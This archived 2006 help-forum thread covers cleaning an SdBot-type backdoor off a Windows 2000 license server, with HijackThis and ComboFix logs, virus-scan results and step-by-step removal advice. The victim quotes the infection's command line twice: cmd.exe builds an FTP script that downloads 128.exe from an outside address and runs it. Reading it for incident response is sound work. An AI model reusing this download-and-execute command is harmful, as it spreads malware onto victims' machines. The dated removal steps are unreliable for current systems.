This is a read-only archive. No new posts or registrations. Privacy Page
Spyware / Malware / Virus Removal

Trojan is a pain in my side

4 min read

This thread's last reply is from . Advice, software, and links below may be out of date — treat specific steps and download links with caution.

Looking for the outcome? Ask AI

One of my license servers has become infected and is causing me great pain. Within Run, the following string or one similar will pop up and be auto executed:

cmd.exe /c del i&echo open 172.20.3.254 6153 > i&echo user 1 1 >> i &echo get 128.exe >> i &echo quit >> i &ftp -n -s:i &128.exe&del i&exit

I've inherited this mess and would appreciate any help. :rant2:

Logfile of HijackThis v1.99.1
Scan saved at 4:56:14 PM, on 12/14/2006
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Alias\Maya6.0.1\docs\Wrapper.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\Alias\Maya6.0.1\docs\jre\bin\java.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Alias\Maya7.0\docs\wrapper.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
C:\WINNT\system32\regsvc.exe
C:\Program Files\Dantz\Client\Remotsvc.exe
C:\Program Files\Dantz\Client\retroclient.exe
C:\Program Files\Alias\Maya7.0\docs\jre\bin\java.exe
C:\Program Files\Remote Task Manager\RTMService.exe
c:\rush\etc\bin\srvany.exe
C:\WINNT\system32\MSTask.exe
c:\rush\bin\rushd.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\Explorer.exe
C:\Program Files\Java\jre1.5.0_05\bin\jusched.exe
C:\Program Files\Java\jre1.5.0_05\bin\jucheck.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\vptray.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\QuickTime\qttask.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\syflex\syserv.exe
C:\WINNT\System32\wuauclt.exe
C:\Documents and Settings\Administrator\Desktop\screwSpyware1991.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\system32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_05\bin\jusched.exe
O4 - HKLM\..\Run: [vptray] C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\vptray.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - Startup: syserv.lnk = C:\syflex\syserv.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_05\bin\npjpi150_05.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_05\bin\npjpi150_05.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/…b?1139638404109
O17 - HKLM\System\CCS\Services\Tcpip\..\{196E27DB-FBAA-4B1E-853C-E921AAD99668}: NameServer = 172.20.5.55,172.20.3.135,206.13.29.12
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = klaskycsupo.com,kc.uni
O17 - HKLM\System\CS1\Services\Tcpip\..\{196E27DB-FBAA-4B1E-853C-E921AAD99668}: NameServer = 172.20.5.55,172.20.3.135,206.13.29.12
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: SearchList = klaskycsupo.com,kc.uni
O17 - HKLM\System\CS2\Services\Tcpip\..\{196E27DB-FBAA-4B1E-853C-E921AAD99668}: NameServer = 172.20.5.55,172.20.3.135,206.13.29.12
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = klaskycsupo.com,kc.uni
O20 - Winlogon Notify: NavLogon - C:\WINNT\system32\NavLogon.dll
O23 - Service: Alias Documentation Server (aliasdocserver) - Unknown owner - C:\Program Files\Alias\Maya6.0.1\docs\Wrapper.exe" -s "C:\Program Files\Alias\Maya6.0.1\docs/Wrapper.conf (file missing)
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O23 - Service: DefWatch - Symantec Corporation - C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Maya 7.0 Documentation Server (maya70docserver) - Unknown owner - C:\Program Files\Alias\Maya7.0\docs\wrapper.exe" -s "C:\Program Files\Alias\Maya7.0\docs\Wrapper.conf (file missing)
O23 - Service: Symantec AntiVirus Client (Norton AntiVirus Server) - Symantec Corporation - C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
O23 - Service: Ray345 Server (Ray345Server) - Unknown owner - C:\Program Files\Alias\mentalray3.45\bin\ray345server.exe
O23 - Service: Retrospect Client - Dantz Development Corporation - C:\Program Files\Dantz\Client\Remotsvc.exe
O23 - Service: Retrospect Helper - EMC Corporation - C:\Program Files\Dantz\Client\rthlpsvc.exe
O23 - Service: Remote Task Manager service (RTM) - Unknown owner - C:\Program Files\Remote Task Manager\RTMService.exe
O23 - Service: Rushd - Unknown owner - c:\rush\etc\bin\srvany.exe
O23 - Service: services - Unknown owner - C:\WINNT\services.exe (file missing)
O23 - Service: SPM License Server (SPMLM) - mental images GmbH - C:\WINNT\system32\spm\spmd.exe
O23 - Service: Windows System Controller - Unknown owner - C:\WINNT\System.exe (file missing)
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

cmd.exe /c del i&echo open 172.20.3.254 6153 > i&echo user 1 1 >> i &echo get 128.exe >> i &echo quit >> i &ftp -n -s:i &128.exe&del i&exit
baddogbreath

Sorry for the delay

Looks like you have a hidden batch script running:

1. Download this file - combofix.exe
2. Double click combofix.exe & follow the prompts.
3. When finished, it shall produce a log for you. Post that log in your next reply

Note: Do not mouseclick combofix's window whilst it's running. That may cause it to stall

thanks bamajim
Hi bamajim, Here are the contents of the combofix log. Many thanks in advance! Administrator - Wed 12/20/2006 11:13:12.43 Service Pack 4 ComboFix 06.11.27 - Running from: "C:\Documents and Settings\Administrator\Desktop" ((((((((((((((((((((((((((((((( Files Created from 2006-11-20 to 2006-12-20 )))))))))))))))))))))))))))))))))) 2006-12-18 14:38 147,456 –a—— C:\WINNT\system32\abv.exe 2006-12-13 22:37 3,968 –a—— C:\WINNT\system32\drivers\AvgAsCln.sys 2006-12-13 21:37 d–hs—- C:\Config.Msi 2006-12-01 19:46 dr-h—– C:\$VAULT$.AVG 2006-12-01 19:44 4,960 –a—— C:\WINNT\system32\drivers\avgtdi.sys 2006-12-01 19:44 3,968 –a—— C:\WINNT\system32\drivers\avgclean.sys 2006-12-01 19:44 28,416 –a—— C:\WINNT\system32\drivers\avg7rsxp.sys 2006-12-01 19:44 26,880 –a—— C:\WINNT\system32\drivers\avg7rsnt.sys 2006-12-01 19:44 18,240 –a—— C:\WINNT\system32\drivers\avgmfx86.sys 2006-12-01 19:44 d——– C:\Documents and Settings\Administrator\Application Data\AVG7 2006-12-01 19:43 816,672 –a—— C:\WINNT\system32\drivers\avg7core.sys 2006-12-01 19:43 4,224 –a—— C:\WINNT\system32\drivers\avg7rsw.sys 2006-12-01 19:43 d-a—— C:\Documents and Settings\All Users\Application Data\avg7 2006-12-01 19:43 d——– C:\Program Files\Grisoft 2006-12-01 19:43 d——– C:\Documents and Settings\All Users\Application Data\Grisoft 2006-11-27 21:11 d–h—– C:\WINNT\PIF (((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))) 2006-12-14 12:18 38160 –a—— C:\WINNT\system32\ftp.exe 2006-12-14 12:18 17168 –a—— C:\WINNT\system32\tftp.exe 2006-12-01 19:43 ——– d—s—- C:\Documents and Settings\Administrator\Application Data\Microsoft (((((((((((((((((((((((((((((((((((((((((( Reg Loading Points )))))))))))))))))))))))))))))))))))))))))))))))) *Note* empty entries are not shown [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run] "Synchronization Manager"="mobsync.exe /logon" "SunJavaUpdateSched"="C:\\Program Files\\Java\\jre1.5.0_05\\bin\\jusched.exe" "vptray"="C:\\Program Files\\Symantec_Client_Security\\Symantec AntiVirus\\vptray.exe" "QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime" "AVG7_CC"="C:\\PROGRA~1\\Grisoft\\AVGFRE~1\\avgcc.exe /STARTUP" "!AVG Anti-Spyware"="\"C:\\Program Files\\Grisoft\\AVG Anti-Spyware 7.5\\avgas.exe\" /minimized" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents] [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL] "Installed"="1" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI] "Installed"="1" "NoChange"="1" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS] "Installed"="1" [HKEY_CURRENT_USER\software\microsoft\internet explorer\desktop\components] "DeskHtmlVersion"=dword:00000110 "DeskHtmlMinorVersion"=dword:00000003 "Settings"=dword:00000001 "GeneralFlags"=dword:00000001 [HKEY_CURRENT_USER\software\microsoft\internet explorer\desktop\components\0] "Source"="About:Home" "SubscribedURL"="About:Home" "FriendlyName"="My Current Home Page" "Flags"=dword:00002002 "Position"=hex:2c,00,00,00,00,01,00,00,00,00,00,00,00,04,00,00,e4,03,00,00,00,\ 00,00,00,01,00,00,00,01,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00 "CurrentState"=hex:04,00,00,40 "OriginalStateInfo"=hex:18,00,00,00,ff,ff,00,00,ff,ff,00,00,ff,ff,ff,ff,ff,ff,\ ff,ff,04,00,00,00 "RestoredStateInfo"=hex:18,00,00,00,f0,01,00,00,b5,00,00,00,80,00,00,00,76,00,\ 00,00,01,00,00,00 [HKEY_USERS\.default\software\microsoft\windows\currentversion\run] "AVG7_Run"="C:\\PROGRA~1\\Grisoft\\AVGFRE~1\\avgw.exe /RUNONCE" [HKEY_USERS\.default\software\microsoft\windows\currentversion\runonce] "^SetupICWDesktop"="C:\\Program Files\\Internet Explorer\\Connection Wizard\\icwconn1.exe /desktop" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\sharedtaskscheduler] "{438755C2-A8BA-11D1-B96B-00A0C90312E1}"="Browseui preloader" "{8C7461EF-2B13-11d2-BE35-3078302C2030}"="Component Categories cache daemon" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks] "{AEB6717E-7E19-11d0-97EE-00C04FD91972}"="" "{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer] "NoDriveTypeAutoRun"=dword:00000095 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Run] [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system] "dontdisplaylastusername"=dword:00000000 "legalnoticecaption"="" "legalnoticetext"="" "shutdownwithoutlogon"=dword:00000001 [HKEY_USERS\.default\software\microsoft\windows\currentversion\policies\explorer] "NoDriveTypeAutoRun"=dword:00000095 [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\shellserviceobjectdelayload] "Network.ConnectionTray"="{7007ACCF-3202-11D1-AAD2-00805FC1270E}" "WebCheck"="{E6FB5E20-DE35-11CF-9C87-00AA005127ED}" "SysTray"="{35CEC8A3-2BE6-11D2-8773-92E220524153}" [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders] "SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll" Completion time: Wed 2006-12-20 11:14:31.50 C:\ComboFix.txt … 06-12-20 11:14
baddogbreath

Because this is a server we are going to have to things a little different

1. We need to make sure we can see hidden files and folders

To enable the viewing of Hidden and System files follow these steps: Right click on Start and select Explore.
Select the Tools menu and click Folder Options.
After the new window appears select the View tab.
Put a checkmark in the checkbox labeled Display the contents of system folders.
Under the Hidden files and folders section select the radio button labeled Show hidden files and folders. Remove the checkmark from the checkbox labeled Hide file extensions for known file types.
Remove the checkmark from the checkbox labeled Hide protected operating system files.
Click Yes To confirm
Press the Apply button and then the OK button.
2. Using Windows Explorer(Right click on "Start," select "Explore," and you will see the "tree' of file folders in the left side of the window. Click on the "+" next to any folder name to expand its contents)
Locate the following folderC:\WINNT\PIF
Rt Click that folder->>Explore Once the folder opens I need a list of files that are in that folder
I'm especially curious if the file CVT.exe is in that folder, include the list in your reply

3. Please upload this file to Jotti's Online Virus Scan C:\WINNT\system32\abv.exe
Click "Browse" at the top of the page
- Navigate to (Locate)C:\WINNT\system32\abv.exe
- Click "Open" Then the "Submit" and let the scan finish
- Scroll down to the bottom of the page to find the results
- Copy/paste the results in your next reply.
Then we will proceed from there

your reply should includeyour file list from the C:\WINNT\PIF folder
the results of the Jotti scan
thanks bamajim
Hey bamajim,

There were no files contained in the C:\WINNT\PIF folder, but it looks like abv.exe is quite the sick file:


Scanner results
AntiVir Found WORM/Sdbot.147456.17
ArcaVir Found Trojan.Sdbot.Aad
Avast Found nothing
AVG Antivirus Found IRC/BackDoor.SdBot2.MWV
BitDefender Found Backdoor.SdBot.CH
ClamAV Found nothing
Dr.Web Found Win32.HLLW.MyBot
F-Prot Antivirus Found W32/Backdoor.YAR
F-Secure Anti-Virus Found Backdoor.Win32.SdBot.aad
Fortinet Found W32/SDBot.AAD!tr.bdr
Kaspersky Anti-Virus Found Backdoor.Win32.SdBot.aad
NOD32 Found nothing
Norman Virus Control Found W32/SDBot.AMZR
VirusBuster Found Worm.RBot.JWO
VBA32 Found Backdoor.Win32.SdBot.aad

Statistics
Last file scanned at least one scanner reported something about: setup.exe (MD5: 91a1764517c9ec974a901d6bf4c55455), detected by:

Scanner Malware name
AntiVir DR/Drop.SennaOneMaker.21 dropper
ArcaVir X
Avast X
AVG Antivirus X
BitDefender Trojan.Dropper.SennaOneMaker.2.1
ClamAV X
Dr.Web Trojan.Sena
F-Prot Antivirus X
F-Secure Anti-Virus Trojan-Dropper.Win32.SennaOneMaker.21
Fortinet HackerTool/SennaOneMaker.V21
Kaspersky Anti-Virus Trojan-Dropper.Win32.SennaOneMaker.21
NOD32 X
Norman Virus Control X
VirusBuster X
VBA32 Win32.SennaOneMaker.2001.10

BTW, I had to go into safe mode to perform the scan. Thanks in advance.

baddogbreath
baddogbreath

Well thats good news about nothing in that folder.

Before we get rid of the other file, I need you to help us out with a little research

Download Suspicious File Packer from here.

Unzip it to your desktop. Open it and copy and paste in this list of files below
When it has created the archive on your desktop please upload that to the forum here.

C:\WINNT\system32\abv.exe

Here are the directions for uploading the file:

Just click "New Topic", fill in the needed details and post a link to your thread here. Click the "Browse" button. Navigate to the file on your computer. When the file is listed in the window click "Post" to upload the file.

Be sure you post the link to this thread in that topic.

Thanks for your help on this

2. Please download the Killbox.1)Save it to the desktop and run it.
2) Select "Delete on Reboot", and then select "All files".
3) Copy the file names below to the clipboard by highlighting them and pressing Control-C:C:\WINNT\system32\abv.exe
4) Return to Killbox, go to the File menu, and choose "Paste from Clipboard".
5) Click the red-and-white "Delete File" button.  Click "Yes" at the Delete on Reboot prompt.  Click "No" at the Pending Operations prompt.
thanks bamajim

Ask AI

AI can make mistakes. Check the cited posts. Archived advice can be out-of-date

Don't include personal information. Questions and selected public posts go to OpenAI. About Ask AI